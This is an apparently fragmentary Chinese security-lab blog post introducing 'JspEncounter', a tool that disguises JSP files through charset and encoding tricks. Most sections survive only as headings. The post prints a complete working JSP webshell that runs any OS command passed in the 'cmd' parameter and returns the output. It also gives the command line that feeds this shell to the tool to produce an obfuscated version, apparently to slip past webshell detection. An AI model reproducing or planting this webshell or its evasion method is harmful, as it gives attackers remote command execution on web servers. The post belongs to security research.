本文来源自平安银河实验室
作者:许纬地(ID: turn1tup)
>>>> 前言
>>>> 矩阵手法
<% import="java.util.*,java.io.*" contentType="text/html" %><%! class Test{} %><%if (request.getParameter ("cmd") != null) {boolean isWin = System.getProperty("os.name").toUpperCase().contains("WIN");String[] cmd = {isWin?"cmd":"/bin/bash",isWin?"/c":"-c",request.getParameter("cmd")};InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();OutputStream outputStream = response.getOutputStream();int a;outputStream.write(String.valueOf(System.currentTimeMillis()).getBytes());while((a=inputStream.read())!=-1){outputStream.write(a);}}%>
java "-Dfile.encoding=utf-8" -jar JspEncounter.jar -m jsp -c matrix.xlsx -s source.jsp -o result.jsp>>>> magic charset
我们打开 matrix.xlsx进行配置,这里配置输出单种字符集文件:
执行命令后,输出的编码后的文件:
>>>> declare charset
>>>> double chraset
>>>> controller space
>>>> unicode & entity
>>>> ext tags
namespace
>>>> 结语
>>>> Reference
-
https://www.anquanke.com/post/id/210630 -
https://www.anquanke.com/post/id/209826 -
extTag setProperty/useBean拼接代码手法 参考补天2022 webshell黑魔法
银河实验室
往期回顾
技术
技术
技术
技术
点赞、分享,感谢你的阅读▼
原文始发于微信公众号(平安集团安全应急响应中心):JSP下的白魔法:JspEncounter
